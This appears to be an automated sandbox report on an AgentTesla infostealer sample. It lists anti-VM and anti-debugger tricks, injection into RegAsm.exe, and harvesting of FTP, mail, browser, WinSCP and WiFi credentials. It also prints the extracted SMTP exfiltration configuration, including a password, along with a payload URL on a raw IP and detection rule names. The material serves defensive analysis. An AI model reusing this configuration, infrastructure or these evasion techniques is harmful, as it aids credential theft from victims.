Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 10_2_01124553

10_2_01124553

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA0F185D2h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA0416350h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA0416373h 0x0000001b push ecx 0x0000001c call 00007F2BA04163E5h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA0770350h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA0770373h 0x0000001b push ecx 0x0000001c call 00007F2BA07703E5h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA094D252h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA0F185A0h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA0F185C3h 0x0000001b push ecx 0x0000001c call 00007F2BA0F18635h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA0416382h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4574 second address: 0000000002BA4556 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F2BA094D220h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F2BA094D243h 0x0000001b push ecx 0x0000001c call 00007F2BA094D2B5h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	RDTSC instruction interceptor: First address: 0000000002BA4556 second address: 0000000002BA4574 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007F2BA0770382h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 10_2_01124553 rdtsc

10_2_01124553

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found large amount of non-executed APIs

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe

API coverage: 8.0 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4872	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6216	Thread sleep time: -45000s >= -30000s			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: bF7H5z6B1q.exe, 00000003.00000002.15790978993.00000000005C3000.00000004.00000020.sdmp	Binary or memory string: \??\C:\ProgramData\qemu-ga\qga.stateE
Source: RegAsm.exe, 0000000A.00000002.16900874307.0000000001120000.00000040.00000001.sdmp	Binary or memory string: C:\ProgramData\qemu-ga\qga.state
Source: RegAsm.exe, 0000000A.00000002.16901627510.00000000013AF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW&
Source: RegAsm.exe, 0000000A.00000002.16901282156.0000000001340000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000000A.00000002.16901627510.00000000013AF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internetw^
Source: bF7H5z6B1q.exe, 00000003.00000002.15790978993.00000000005C3000.00000004.00000020.sdmp	Binary or memory string: C:\ProgramData\qemu-ga\qga.statem
Source: RegAsm.exe, 0000000A.00000002.16915141303.0000000022510000.00000002.00000001.sdmp	Binary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.

Queries a list of all running processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 10_2_0112039C NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000

10_2_0112039C

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 10_2_01124553 rdtsc

10_2_01124553

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 10_2_01124EF6 LdrInitializeThunk,

10_2_01124EF6

Contains functionality to read the PEB

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01122907 mov eax, dword ptr fs:[00000030h]	10_2_01122907
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112290C mov eax, dword ptr fs:[00000030h]	10_2_0112290C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112296C mov eax, dword ptr fs:[00000030h]	10_2_0112296C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_011224B4 mov eax, dword ptr fs:[00000030h]	10_2_011224B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01129F1B mov eax, dword ptr fs:[00000030h]	10_2_01129F1B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01128700 mov eax, dword ptr fs:[00000030h]	10_2_01128700
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01127200 mov eax, dword ptr fs:[00000030h]	10_2_01127200
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01124277 mov eax, dword ptr fs:[00000030h]	10_2_01124277
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01124279 mov eax, dword ptr fs:[00000030h]	10_2_01124279
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_0112728F mov eax, dword ptr fs:[00000030h]	10_2_0112728F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 10_2_01121AA2 mov eax, dword ptr fs:[00000030h]	10_2_01121AA2

Enables debug privileges

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Users\user\Desktop\bF7H5z6B1q.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000A.00000002.16903261598.00000000018D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5096, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5096, type: MEMORY

Malware Configuration

Threatname: Agenttesla

{"Username: ": "=0A0jhVRt", "URL: ": "http://65WgO3Tt3vwSLEL.net", "To: ": "chimez2@originloger.com", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "DSMwV2T", "From: ": "chimez2@originloger.com"}

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bF7H5z6B1q.exe	16%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin	9%	Virustotal		Browse
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	3%	Virustotal		Browse
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0A	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Virustotal		Browse
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binP	0%	Avira URL Cloud	safe
http://65WgO3Tt3vwSLEL.net	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18_RID328F	Semiautomatic generated rule - file scan copy.pdf.r11	Florian Roth	0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18_RID328F	Semiautomatic generated rule - file scan copy.pdf.r11	Florian Roth	0x10c20:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: RegAsm.exe PID: 5096	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Unpacked PEs

No yara matches

Sigma Overview

System Summary:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 5096, Protocol: tcp, SourceIp: 192.168.0.80, SourceIsIpv6: false, SourcePort: 49771

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
208.91.199.223	Price List Order SV 26.doc	Get hash	malicious	Browse
	RFQ#NS109004.PDF.exe	Get hash	malicious	Browse
	Copia rapida 954789400_PDF__________________________.exe	Get hash	malicious	Browse
	Order code PO 2019930-002793.exe	Get hash	malicious	Browse
	EPC Samgori South Dome Underground Gas Storage Project.exe	Get hash	malicious	Browse
	PO19005309.exe	Get hash	malicious	Browse
	PaymentConfirmation.exe	Get hash	malicious	Browse
	Scan Document21112019 pdf.exe	Get hash	malicious	Browse
	x4NQLBB9Rs.exe	Get hash	malicious	Browse
	x4NQLBB9Rs.exe	Get hash	malicious	Browse
	Scan Document11192019 pdf.exe	Get hash	malicious	Browse
	#3640.exe	Get hash	malicious	Browse
	10CI099808.exe	Get hash	malicious	Browse
	8INVOICE.exe	Get hash	malicious	Browse
	37SWIFT DOO732019USD67,000.exe	Get hash	malicious	Browse
	3RFQ SAUDI ARAMCO 001992019324541_pdf.exe	Get hash	malicious	Browse
	1SHIP PARTICULARS.exe	Get hash	malicious	Browse
	26RFQ SAUDI ARAMCO 001222345533_pdf.exe	Get hash	malicious	Browse
	11659097.exe	Get hash	malicious	Browse
	37601270.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
us2.smtp.mailhostbox.com	Remittance Copy.xlsx	Get hash	malicious	Browse	208.91.199.224
	20-04-2020 INQUIRY.xlsx	Get hash	malicious	Browse	208.91.198.143
	RFQ 00072165431270-21867223 DALSON.xlsx	Get hash	malicious	Browse	208.91.198.143
	575698354.exe	Get hash	malicious	Browse	208.91.199.224
	ScaNovatech20040.exe	Get hash	malicious	Browse	208.91.199.225
	https://www.dropbox.com/s/gqt2qs2gl2jlyke/PO_ODO_PO_NO_H012737000483498593849383849584939484859985969pdf.zip?dl=1	Get hash	malicious	Browse	208.91.199.224
	Swift Advice.xlsx	Get hash	malicious	Browse	208.91.199.224
	Price List Order SV 26.doc	Get hash	malicious	Browse	208.91.199.223
	Updated Company Profile.doc	Get hash	malicious	Browse	208.91.199.225
	RFQ#NS109004.PDF.exe	Get hash	malicious	Browse	208.91.199.223
	Att1.exe	Get hash	malicious	Browse	208.91.199.224
	COTIZACI#U00d3N.exe	Get hash	malicious	Browse	208.91.199.224
	Bank Copy.exe	Get hash	malicious	Browse	208.91.199.225
	RAY ZONE ENG (HK) LTD DOCUMENTS.exe	Get hash	malicious	Browse	208.91.199.225
	Copia rapida 954789400_PDF__________________________.exe	Get hash	malicious	Browse	208.91.199.223
	SWift 1011.doc	Get hash	malicious	Browse	208.91.199.225
	Order code PO 2019930-002793.exe	Get hash	malicious	Browse	208.91.199.223
	EPC Samgori South Dome Underground Gas Storage Project.exe	Get hash	malicious	Browse	208.91.199.223
	PO19005309.exe	Get hash	malicious	Browse	208.91.199.223
	PaymentConfirmation.exe	Get hash	malicious	Browse	208.91.199.223

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	#Ufffd Univarsolutions.com Audio_4544.htm	Get hash	malicious	Browse	177.38.225.164
	https://us4.campaign-archive.com/?u=7bb303352d3e288fec819355c&id=ed1e5d4a10	Get hash	malicious	Browse	93.184.220.70
	https://onedrive.live.com/redir?resid=2C2291C74E713314%21104&authkey=%21ACOY1Glsl6q0vOU&page=View&wd=target%28Proposal%20Documents.one%7C3f5011c8-cc81-4bfe-9cc9-2ddfcd8d1d01%2FTom%20Teixeira%C2%A0has%20shared%20a%20file%20with%20you%7C2b554aa7-ace7-4571-8069-abba1b0a2f61%2F%29	Get hash	malicious	Browse	104.16.132.229
	https://storage.googleapis.com/aonedrive-cybernetical-405548657/index.html	Get hash	malicious	Browse	104.18.35.124
	https://slack-redir.net/link?url=https%3A%2F%2Fsway.office.com%2FsnFeFDIRR8QzhBYg%3Fref%3DLink&v=3	Get hash	malicious	Browse	104.16.132.229
	http://kjdfjdkfjdfkdf.com/	Get hash	malicious	Browse	192.67.198.33
	Judgement_04212020_9774.vbs	Get hash	malicious	Browse	116.202.49.153
	Judgement_04212020_9774.vbs	Get hash	malicious	Browse	116.202.49.153
	http://us-api.mimecast.com.kb4.io/XYWNd0aW9uPWpNsaWNrJnzVybD1orldHRwoczovL3NleY3kVyZWQtbG9naW4ubmV0kL3BhZ2VzL2NlNzJlNTJmNTU0MSZyZWNpcGllbnRfaWQ9NjA5NTAwOTc2JmNhbXBhaWduX3J1bl9pZD0zMDc3NjUw	Get hash	malicious	Browse	52.206.93.196
	open_attach_n2k.js	Get hash	malicious	Browse	47.241.106.208
	FEDEXAMAZONPDF.jar	Get hash	malicious	Browse	79.134.225.111
	Judgement_04212020_9774.vbs	Get hash	malicious	Browse	116.202.49.153
	#Ud83d#Udcdevm.htm	Get hash	malicious	Browse	198.54.116.110
	FEDEXAMAZONPDF.jar	Get hash	malicious	Browse	79.134.225.111
	Read Me.exe	Get hash	malicious	Browse	172.217.168.33
	job_attach_t9o.js	Get hash	malicious	Browse	47.241.106.208
	Invoice F-989930.pdf	Get hash	malicious	Browse	104.26.4.108
	PreviewDocument (1).exe	Get hash	malicious	Browse	51.81.113.26
	https://soo.gd/3UDb	Get hash	malicious	Browse	52.212.250.49
	PreviewDocument (1).exe	Get hash	malicious	Browse	51.81.113.26
unknown	#Ufffd Univarsolutions.com Audio_4544.htm	Get hash	malicious	Browse	177.38.225.164
	https://us4.campaign-archive.com/?u=7bb303352d3e288fec819355c&id=ed1e5d4a10	Get hash	malicious	Browse	93.184.220.70
	https://onedrive.live.com/redir?resid=2C2291C74E713314%21104&authkey=%21ACOY1Glsl6q0vOU&page=View&wd=target%28Proposal%20Documents.one%7C3f5011c8-cc81-4bfe-9cc9-2ddfcd8d1d01%2FTom%20Teixeira%C2%A0has%20shared%20a%20file%20with%20you%7C2b554aa7-ace7-4571-8069-abba1b0a2f61%2F%29	Get hash	malicious	Browse	104.16.132.229
	https://storage.googleapis.com/aonedrive-cybernetical-405548657/index.html	Get hash	malicious	Browse	104.18.35.124
	https://slack-redir.net/link?url=https%3A%2F%2Fsway.office.com%2FsnFeFDIRR8QzhBYg%3Fref%3DLink&v=3	Get hash	malicious	Browse	104.16.132.229
	http://kjdfjdkfjdfkdf.com/	Get hash	malicious	Browse	192.67.198.33
	Judgement_04212020_9774.vbs	Get hash	malicious	Browse	116.202.49.153
	Judgement_04212020_9774.vbs	Get hash	malicious	Browse	116.202.49.153
	http://us-api.mimecast.com.kb4.io/XYWNd0aW9uPWpNsaWNrJnzVybD1orldHRwoczovL3NleY3kVyZWQtbG9naW4ubmV0kL3BhZ2VzL2NlNzJlNTJmNTU0MSZyZWNpcGllbnRfaWQ9NjA5NTAwOTc2JmNhbXBhaWduX3J1bl9pZD0zMDc3NjUw	Get hash	malicious	Browse	52.206.93.196
	open_attach_n2k.js	Get hash	malicious	Browse	47.241.106.208
	FEDEXAMAZONPDF.jar	Get hash	malicious	Browse	79.134.225.111
	Judgement_04212020_9774.vbs	Get hash	malicious	Browse	116.202.49.153
	#Ud83d#Udcdevm.htm	Get hash	malicious	Browse	198.54.116.110
	FEDEXAMAZONPDF.jar	Get hash	malicious	Browse	79.134.225.111
	Read Me.exe	Get hash	malicious	Browse	172.217.168.33
	job_attach_t9o.js	Get hash	malicious	Browse	47.241.106.208
	Invoice F-989930.pdf	Get hash	malicious	Browse	104.26.4.108
	PreviewDocument (1).exe	Get hash	malicious	Browse	51.81.113.26
	https://soo.gd/3UDb	Get hash	malicious	Browse	52.212.250.49
	PreviewDocument (1).exe	Get hash	malicious	Browse	51.81.113.26

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w10x64native

bF7H5z6B1q.exe (PID: 2608 cmdline: 'C:\Users\user\Desktop\bF7H5z6B1q.exe' MD5: 87E74AF7016E8A9B9304DC537FA093DA)

RegAsm.exe (PID: 5096 cmdline: 'C:\Users\user\Desktop\bF7H5z6B1q.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)

conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)

netsh.exe (PID: 7048 cmdline: 'netsh' wlan show profile MD5: 847B74DC766070B0FAD7DABF0B239999)

conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)

cleanup

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	false		high

Contacted URLs

